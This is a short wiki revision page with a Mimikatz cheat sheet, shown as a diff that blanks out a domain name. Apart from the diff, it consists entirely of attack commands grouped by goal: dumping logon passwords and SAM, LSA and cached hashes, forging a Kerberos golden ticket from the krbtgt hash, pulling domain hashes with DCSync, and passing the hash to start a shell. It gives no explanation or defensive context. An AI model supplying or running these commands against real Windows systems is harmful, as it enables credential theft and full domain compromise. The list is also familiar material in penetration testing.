Mimikatz: Difference between revisions
Jump to navigation
Jump to search
(Created page with "=== Steal creds === * privilege::debug * sekurlsa::logonpasswords === Dump Hashes === * token::elevate * lsadump::sam * lsadump::lsa /patch * lsadump::lsa /inject * lsadump::cache * sekurlsa::ekeys === Create a golden ticket on DC === * privilege::debug * lsadump::lsa /inject /name:krbtgt * kerberos::golden /user:administrator /domain:ulaser /sid: /krbtgt: /id: * misc::cmd === Retrieve the password hashes of user accounts from a domain controller === * lsadump::dcsync...") |
|||
Line 13: | Line 13: | ||
* privilege::debug | * privilege::debug | ||
* lsadump::lsa /inject /name:krbtgt | * lsadump::lsa /inject /name:krbtgt | ||
* kerberos::golden /user: | * kerberos::golden /user: /domain: /sid: /krbtgt: /id: | ||
* misc::cmd | * misc::cmd | ||
Revision as of 22:14, 24 June 2023
Steal creds
- privilege::debug
- sekurlsa::logonpasswords
Dump Hashes
- token::elevate
- lsadump::sam
- lsadump::lsa /patch
- lsadump::lsa /inject
- lsadump::cache
- sekurlsa::ekeys
Create a golden ticket on DC
- privilege::debug
- lsadump::lsa /inject /name:krbtgt
- kerberos::golden /user: /domain: /sid: /krbtgt: /id:
- misc::cmd
Retrieve the password hashes of user accounts from a domain controller
- lsadump::dcsync /user:
Pass the Hash
- sekurlsa::pth /user: /domain: /ntlm: /run:cmd